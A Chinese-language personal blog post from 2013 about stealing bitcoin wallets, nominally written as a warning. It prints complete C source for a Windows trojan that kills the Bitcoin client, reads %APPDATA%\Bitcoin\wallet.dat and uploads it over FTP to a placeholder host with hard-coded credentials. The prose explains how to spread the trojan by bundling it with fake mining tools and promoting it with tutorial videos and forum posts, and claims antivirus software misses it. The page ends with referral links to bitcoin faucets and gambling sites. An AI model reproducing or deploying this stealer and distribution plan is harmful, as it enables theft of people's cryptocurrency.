<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>如果偷取别人的比特币 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="“如何获取偷取别人的wallet.dat文件”，这个文件包含所有的虚拟币，当然阐述此文的目的不是让你偷取别人的比特币而是让你知道如何保护自己的电子钱包整个流程其实很简单，一小段C语言代码运行查找appdata文件夹下的wallet.dat文件，然后通过FTP上传至别人的电脑，或者通过其他文件传输协议，黑客通过加壳重命名、类似的代码注入、传播、扩散可以很轻松的获取别人的电子钱包">
<meta property="og:type" content="article">
<meta property="og:title" content="如果偷取别人的比特币">
<meta property="og:url" content="http://yoursite.com/2013/05/24/2013-05-22-free-bitcoin/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="“如何获取偷取别人的wallet.dat文件”，这个文件包含所有的虚拟币，当然阐述此文的目的不是让你偷取别人的比特币而是让你知道如何保护自己的电子钱包整个流程其实很简单，一小段C语言代码运行查找appdata文件夹下的wallet.dat文件，然后通过FTP上传至别人的电脑，或者通过其他文件传输协议，黑客通过加壳重命名、类似的代码注入、传播、扩散可以很轻松的获取别人的电子钱包">
<meta property="og:image" content="http://yoursite.com/images/photos/2012-05-24-steal-bitcoin-01.png">
<meta property="og:image" content="http://yoursite.com/images/photos/2012-05-24-steal-bitcoin-02.png">
<meta property="og:updated_time" content="2013-08-11T10:53:43.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="如果偷取别人的比特币">
<meta name="twitter:description" content="“如何获取偷取别人的wallet.dat文件”，这个文件包含所有的虚拟币，当然阐述此文的目的不是让你偷取别人的比特币而是让你知道如何保护自己的电子钱包整个流程其实很简单，一小段C语言代码运行查找appdata文件夹下的wallet.dat文件，然后通过FTP上传至别人的电脑，或者通过其他文件传输协议，黑客通过加壳重命名、类似的代码注入、传播、扩散可以很轻松的获取别人的电子钱包">
<meta name="twitter:image" content="http://yoursite.com/images/photos/2012-05-24-steal-bitcoin-01.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  

</head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="Flux RSS"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Rechercher"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" results="0" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-2013-05-22-free-bitcoin" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2013/05/24/2013-05-22-free-bitcoin/" class="article-date">
  <time datetime="2013-05-24T05:16:18.000Z" itemprop="datePublished">2013-05-24</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/虚拟货币/">虚拟货币</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      如果偷取别人的比特币
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>“如何获取偷取别人的<strong>wallet.dat</strong>文件”，这个文件包含所有的虚拟币，当然阐述此文的目的不是让你偷取别人的比特币而是让你知道如何保护自己的电子钱包<br>整个流程其实很简单，一小段C语言代码运行查找appdata文件夹下的wallet.dat文件，然后通过FTP上传至别人的电脑，或者通过其他文件传输协议，黑客通过加壳重命名、类似的代码注入、传播、扩散可以很轻松的获取别人的电子钱包</p>
<p><img src="/images/photos/2012-05-24-steal-bitcoin-01.png" alt="steal bitcoin"></p>
<a id="more"></a>
<h2 id="黑客如何知道我有比特币，如何有效传播木马给比特币的用户？"><a href="#黑客如何知道我有比特币，如何有效传播木马给比特币的用户？" class="headerlink" title="黑客如何知道我有比特币，如何有效传播木马给比特币的用户？"></a>黑客如何知道我有比特币，如何有效传播木马给比特币的用户？</h2><p>很简单，学习过社会工程学的基本知识就可以搞定，绑定这个木马到任何相关的比特币程序中,比如官网的“比特币挖矿机”,”Bitcoin Stealer Maker”这个木马本身,然后上传一段视频教程到视频网站,然后在论坛推广,多数人会受不了这个诱惑，下载了木马，然后….就没有然后了,因为虽说是木马,但是现在的防毒防木马软件根本无法察觉,因为这种可以说不是木马也不是病毒,可以完全无法察觉,当你觉得你赚取了别人的比特币,实际上已经被别人偷去了比特币</p>
<h2 id="如何写一个偷取比特币的程序？"><a href="#如何写一个偷取比特币的程序？" class="headerlink" title="如何写一个偷取比特币的程序？"></a>如何写一个偷取比特币的程序？</h2><p>下面的程序是一个简单的例子，切记不要用于任何非法盈利比特币的行为中</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></div><div class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;tlhelp32.h&gt;</span></span></div><div class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;tchar.h&gt;</span></span></div><div class="line"></div><div class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;wininet.h&gt;</span></span></div><div class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;ctime&gt;</span></span></div><div class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;iostream&gt;</span></span></div><div class="line"><span class="meta">#<span class="meta-keyword">pragma</span> comment(lib, <span class="meta-string">"wininet"</span>)</span></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">void</span> <span class="title">killprocess</span><span class="params">()</span></span></div><div class="line">&#123;</div><div class="line">	HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, <span class="number">0</span> );</div><div class="line">    <span class="comment">// Get the process list snapshot.</span></div><div class="line">    PROCESSENTRY32 ProcessEntry = &#123; <span class="number">0</span> &#125;;</div><div class="line">    <span class="comment">// Initialize the process entry structure.</span></div><div class="line">    ProcessEntry.dwSize = <span class="keyword">sizeof</span>( ProcessEntry );</div><div class="line">    <span class="comment">// Get the first process info</span></div><div class="line">    BOOL Return = FALSE;</div><div class="line">    Return = Process32First( hProcessSnapShot,&amp;ProcessEntry );</div><div class="line">    <span class="keyword">int</span> value = _tcsicmp(ProcessEntry.szExeFile, _T(<span class="string">"bitcoin.exe"</span>));</div><div class="line">    </div><div class="line">    <span class="keyword">if</span> (value==<span class="number">0</span>)</div><div class="line">    &#123;</div><div class="line">        HANDLE hProcess = OpenProcess(PROCESS_TERMINATE</div><div class="line">        	, FALSE</div><div class="line">        	, ProcessEntry.th32ProcessID);</div><div class="line">        <span class="comment">//Open Process to terminate</span></div><div class="line">        TerminateProcess(hProcess,<span class="number">0</span>);</div><div class="line">        CloseHandle(hProcess); <span class="comment">//Close Handle &#125;</span></div><div class="line">    &#125;</div><div class="line">    </div><div class="line">    <span class="keyword">while</span>( Process32Next( hProcessSnapShot, &amp;ProcessEntry ));</div><div class="line">    CloseHandle( hProcessSnapShot );</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">int</span> WINAPI <span class="title">WinMain</span><span class="params">(HINSTANCE hInstance</span></span></div><div class="line">, HINSTANCE hPrevInstance</div><div class="line">, LPSTR lpCmdLine</div><div class="line">, <span class="keyword">int</span> nCmdShow)</div><div class="line">&#123;</div><div class="line">    killprocess();</div><div class="line">    Sleep(<span class="number">40000</span>);</div><div class="line"></div><div class="line">    <span class="comment">// 随机种子</span></div><div class="line">    srand((<span class="keyword">unsigned</span>)time(<span class="literal">NULL</span>));</div><div class="line">    <span class="keyword">int</span> seedone=rand();                             </div><div class="line">    <span class="keyword">int</span> seedtwo=rand()*<span class="number">3</span>;                           </div><div class="line">    <span class="keyword">int</span> seedboth = seedone + seedtwo;</div><div class="line"></div><div class="line">    <span class="comment">// 强转int同char</span></div><div class="line">    <span class="keyword">char</span> randomseed[<span class="number">99</span>];</div><div class="line">	itoa(seedboth,randomseed,<span class="number">10</span>);</div><div class="line"></div><div class="line">    <span class="comment">// 防止wallet.dat因相同文件名而在ftp时被重写</span></div><div class="line">    <span class="keyword">char</span>* appdata = getenv(<span class="string">"APPDATA"</span>);  <span class="comment">// %Appdata%</span></div><div class="line">    <span class="keyword">char</span>* truepath = <span class="built_in">strcat</span>(appdata, <span class="string">"\\Bitcoin\\wallet.dat"</span>);</div><div class="line"></div><div class="line">    <span class="comment">//ftp</span></div><div class="line">    HINTERNET hInternet;</div><div class="line">    HINTERNET hFtpSession;</div><div class="line">    hInternet = InternetOpen(<span class="literal">NULL</span>,INTERNET_OPEN_TYPE_DIRECT,<span class="literal">NULL</span>,<span class="literal">NULL</span>,<span class="number">0</span>);</div><div class="line">    hFtpSession = InternetConnect(hInternet</div><div class="line">    	, <span class="string">"ftp.host.com"</span></div><div class="line">    	, INTERNET_DEFAULT_FTP_PORT</div><div class="line">    	, <span class="string">"user@host.com"</span></div><div class="line">    	, <span class="string">"bigdickben"</span></div><div class="line">    	, INTERNET_SERVICE_FTP</div><div class="line">    	, <span class="number">0</span>, <span class="number">0</span>);  <span class="comment">//ftp host, user, pass</span></div><div class="line"></div><div class="line">    FtpPutFile(hFtpSession</div><div class="line">    	, truepath </div><div class="line">    	, randomseed </div><div class="line">    	, FTP_TRANSFER_TYPE_BINARY, <span class="number">0</span>);</div><div class="line">    FtpPutFile(hFtpSession</div><div class="line">    	, truepath</div><div class="line">    	, randomseed</div><div class="line">    	, FTP_TRANSFER_TYPE_BINARY, <span class="number">0</span>);</div><div class="line"></div><div class="line">    InternetCloseHandle(hFtpSession);</div><div class="line">    InternetCloseHandle(hInternet);</div><div class="line">   </div><div class="line">    <span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>当然真正的木马不会像上面的程序这样简单，可能会混淆特征码，加壳，添加复制自身代码，写到其他程序中等等方式隐蔽自己，所以亲，如果你不是程序高手请珍惜比特币，远离XXXX</p>
<p><img src="/images/photos/2012-05-24-steal-bitcoin-02.png" alt="steal bitcoin"></p>
<p>记住不要被欲望冲昏了头脑迷住了眼睛</p>
<h2 id="【广告】免费获得比特币-10-持续更新中"><a href="#【广告】免费获得比特币-10-持续更新中" class="headerlink" title="【广告】免费获得比特币(10+持续更新中)"></a><strong>【广告】免费获得比特币(10+持续更新中)</strong></h2><p>赠送的额度随着比特币的价值波动变化，目前基本领取的是越来越少</p>
<h2 id="完成任务获取"><a href="#完成任务获取" class="headerlink" title="完成任务获取"></a>完成任务获取</h2><ul>
<li><a href="http://cur.lv/yj50" target="_blank" rel="external">bitvisit</a> <strong>强力推荐</strong>每隔5分钟点击next会获得不定量的比特币，非常不错，可以开多个窗口哦【建议】</li>
<li><a href="http://cur.lv/yjdx" target="_blank" rel="external">iwantfreebitcoins</a> 填写各种调查问卷、安装试用软件或者其它小任务免费得到比特币【不建议】</li>
<li><a href="http://www.bitcoinget.com/" target="_blank" rel="external">bitcoinget</a>问卷调查、视频、其他任务【不建议】</li>
<li><a href="http://cur.lv/yshe" target="_blank" rel="external">CoinTube</a> 看视频获取</li>
<li><a href="http://cur.lv/ysid" target="_blank" rel="external">Coin Reaper</a> 随机读取一个免费比特币网站赚取</li>
</ul>
<h2 id="发布链接和打广告"><a href="#发布链接和打广告" class="headerlink" title="发布链接和打广告"></a>发布链接和打广告</h2><ul>
<li><a href="http://cur.lv/yk3p" target="_blank" rel="external">Anonymous Ads</a> 类似Google AdSense的广告商，不过它的特色在匿名性，不需要注册，只要提供一个收款用的比特币地址即可运作，当然也可以在上面登广告</li>
<li><a href="https://coinurl.com/" target="_blank" rel="external">CoinURL</a> 提供了一个带广告的短链接，这样你就可以从对外张贴它处理后的短链接来赚比特币了，所以即使你不是网站主或者博主也可以通过论坛签名里的链接改成此短链接等方式来挣比特币，另外也提供类似Google AdSense的广告服务</li>
</ul>
<h2 id="一次性提供免费比特币"><a href="#一次性提供免费比特币" class="headerlink" title="一次性提供免费比特币"></a>一次性提供免费比特币</h2><ul>
<li><a href="http://cur.lv/yk4j" target="_blank" rel="external">Bitcoin Street Faucet</a> 填写手机号，认证后免费获赠比特币</li>
<li><a href="http://cur.lv/yk5h" target="_blank" rel="external">DragonTale</a> 在线赌场，目前注册后会送一笔可以直接提出的比特币，每天获取一次比特币</li>
<li><a href="http://cur.lv/yk6t" target="_blank" rel="external">bitcoinaddict</a> 填写收款地址，免费获取比特币</li>
<li><a href="http://cur.lv/yk61" target="_blank" rel="external">dailybitcoins</a> 填写一个验证码，每天获取(随机)的一定数量的比特币，一天一次</li>
</ul>
<h2 id="博彩"><a href="#博彩" class="headerlink" title="博彩"></a>博彩</h2><ul>
<li><a href="http://cur.lv/yskh" target="_blank" rel="external">http://www.freebitcoinlottery.com/</a> 猜6个号码，最高给100000uBTC</li>
<li><a href="http://cur.lv/ysj5" target="_blank" rel="external">Free BitCoin Daily Scratchcard</a> 获得0.005或更多</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2013/05/24/2013-05-22-free-bitcoin/" data-id="ciu28wl4300049ks6cdanq4ht" class="article-share-link">Partager</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/free-bitcoin/">free bitcoin</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2013/06/08/2013-06-08-capture-back-menu-with-history-api/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Récent</strong>
      <div class="article-nav-title">
        
          利用history api截获返回事件
        
      </div>
    </a>
  
  
    <a href="/2013/05/14/2013-05-14-hashmap-dot-get-cause-an-infinite-loop/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Ancien</strong>
      <div class="article-nav-title">HashMap.get()所导致的的死循环</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Catégories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/android/">android</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/deep-learning/">deep learning</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/java/">java</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/javascript/">javascript</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/octopress/">octopress</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/虚拟货币/">虚拟货币</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Mot-clés</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/DDOS/">DDOS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Deep-Learning/">Deep Learning</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/I-O-performance/">I/O performance</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Scrolling-performance/">Scrolling performance</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/UI-performance/">UI performance</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/custom-elements/">custom elements</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/decorator/">decorator</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/free-bitcoin/">free bitcoin</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/import/">import</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/javascript/">javascript</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/seo/">seo</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/shadow-DOM/">shadow DOM</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/templates/">templates</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/人脸检测/">人脸检测</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/历史记录/">历史记录</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/悬浮窗/">悬浮窗</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Nuage de mot-clés</h3>
    <div class="widget tagcloud">
      <a href="/tags/DDOS/" style="font-size: 10px;">DDOS</a> <a href="/tags/Deep-Learning/" style="font-size: 10px;">Deep Learning</a> <a href="/tags/I-O-performance/" style="font-size: 10px;">I/O performance</a> <a href="/tags/Scrolling-performance/" style="font-size: 10px;">Scrolling performance</a> <a href="/tags/UI-performance/" style="font-size: 10px;">UI performance</a> <a href="/tags/custom-elements/" style="font-size: 10px;">custom elements</a> <a href="/tags/decorator/" style="font-size: 10px;">decorator</a> <a href="/tags/free-bitcoin/" style="font-size: 10px;">free bitcoin</a> <a href="/tags/import/" style="font-size: 10px;">import</a> <a href="/tags/javascript/" style="font-size: 10px;">javascript</a> <a href="/tags/seo/" style="font-size: 10px;">seo</a> <a href="/tags/shadow-DOM/" style="font-size: 10px;">shadow DOM</a> <a href="/tags/templates/" style="font-size: 10px;">templates</a> <a href="/tags/人脸检测/" style="font-size: 10px;">人脸检测</a> <a href="/tags/历史记录/" style="font-size: 10px;">历史记录</a> <a href="/tags/悬浮窗/" style="font-size: 10px;">悬浮窗</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2014/02/">February 2014</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2013/08/">August 2013</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2013/07/">July 2013</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2013/06/">June 2013</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2013/05/">May 2013</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Articles récents</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2014/02/10/人脸检测与打码/">人脸自动检测与打码【基础篇】</a>
          </li>
        
          <li>
            <a href="/2013/08/25/deep-learning---round-1/">Deep Learning Reserch - Round 1</a>
          </li>
        
          <li>
            <a href="/2013/08/11/仿360chathead等app悬浮窗效果/">仿360|ChatHead等APP悬浮窗和动画效果</a>
          </li>
        
          <li>
            <a href="/2013/07/16/2013-07-13-android-performance/">android深度优化</a>
          </li>
        
          <li>
            <a href="/2013/06/29/2013-06-29-web-components/">Web组件(Web Components) | HTML5</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2016 John Doe<br>
      Propulsé by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>

  </div>
</body>
</html>